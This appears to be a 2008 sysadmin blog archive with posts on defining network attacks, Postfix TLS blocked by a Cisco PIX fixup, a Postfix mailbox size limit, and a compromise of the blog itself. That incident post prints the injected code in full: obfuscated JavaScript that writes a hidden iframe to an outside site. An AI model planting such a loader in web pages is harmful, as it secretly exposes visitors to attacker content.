I will post later a few examples of network attacks. But, before that, I want to clarify what I call a network attack.

I see many people making a confusion about the use of this term, even among professional or specialized journalists. Whenever there is a hack originated from the Internet, they call it a network attack.

This is a true misunderstanding of the reality. We will see why when a website is hacked, or a domain name spoofed, we can’t call it a network attack.

First of all, we need to have a good picture of the way the protocols of the Internet are organized.

We can visualize it with the OSI concept, whose scheme is below :

This model offers 7 layers to contain all protocols involved in the data transportation, from the system or the program of a local computer to its peer on the other side of the network.

Continue Reading »

JC :: Jun.23.2008 :: Hacking, Network, Security :: No Comments »

As I just finished setting TLS and SASL to secure the access to my Postfix server, I realized that it was working only from inside my network.

What I got from my lan :

$ telnet mars 25
Trying 192.168.222.10...
Connected to phocean.net.
Escape character is '^]'.
220 phocean.net ESMTP Postfix (Debian/GNU)
ehlo phocean.net
250-phocean.net
250-PIPELINING
250-SIZE 200000000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH NTLM DIGEST-MD5 CRAM-MD5
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

I shows well that the TLS handshake is initiated.

But from this outside, I just got this weired thing :

$ telnet phocean.net 25
Trying 81.64.194.119...
Connected to phocean.net.
Escape character is '^]'.
220 **********************************************
ehlo phocean.net
502 5.5.2 Error: command not recognized

Of course, the firewall, a Cisco Pix one, was properly set to redirect port 25 UDP/TCP to my server.

However, I soon focused my effort on this equipment. I considered a while that the cause could be some filtering from my provider, but most probably, the problem came from the Pix.

That was not difficult to figure out : it had some protocol inspector activated for SMTP :

$ sh ru
[...]
fixup protocol smtp 25
[...]

Just after :

> no fixup protocol smtp 25

… it started to work perfectly well !!!

The engine for the SMTP protocol could not recognize the TLS handshake, considered that the SMTP session as not valid and therefore blocked it !

I can deactivate it without any fear as my Postfix server is already pretty well secured, or at least configured to reject any weired SMTP dialog.

JC :: Jun.11.2008 :: Cisco, Firewalling :: No Comments »

This blog got hacked yesterday.

It looks like some spammer managed to inject some PHP code into almost all *.php files of Wordpress.
It was not just like the classic SQL injection that is usually used to post some malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Continue Reading »

JC :: Jun.03.2008 :: Cisco, Hacking, Hardware, Linux, News, Perl, Security, Web, Web :: 5 Comments »

I suddenly started to received some undelivered mail notifications while I was trying to send some messages to a mailbox hosted on my Postfix server.

The cause described in the notification was :

error writing message: File too large

The first thing I did was checking my configuration file, main.cf.
It seemed all right :

[...]
mailbox_size_limit = 0
message_size_limit = 200000000
[...]

Note that “0″ means unlimited.
I checked the mailbox in question : it was nearing the size of 50 Mb.

I started to think that during some Postfix update, the meaning of the value “0″ may have changed.
I tried different values without success.

I started to become crazy with that, but, finally, after quite a long time spent on google, I finally found the trick, which is just a simple line to add in main.cf :

virtual_mailbox_limit = 0

Indeed, I use virtual users as mail account ! I just never imagined there was a differtent setting for virtual users (which can be a convenient setting in some case).

JC :: Jun.01.2008 :: Admin, System :: No Comments »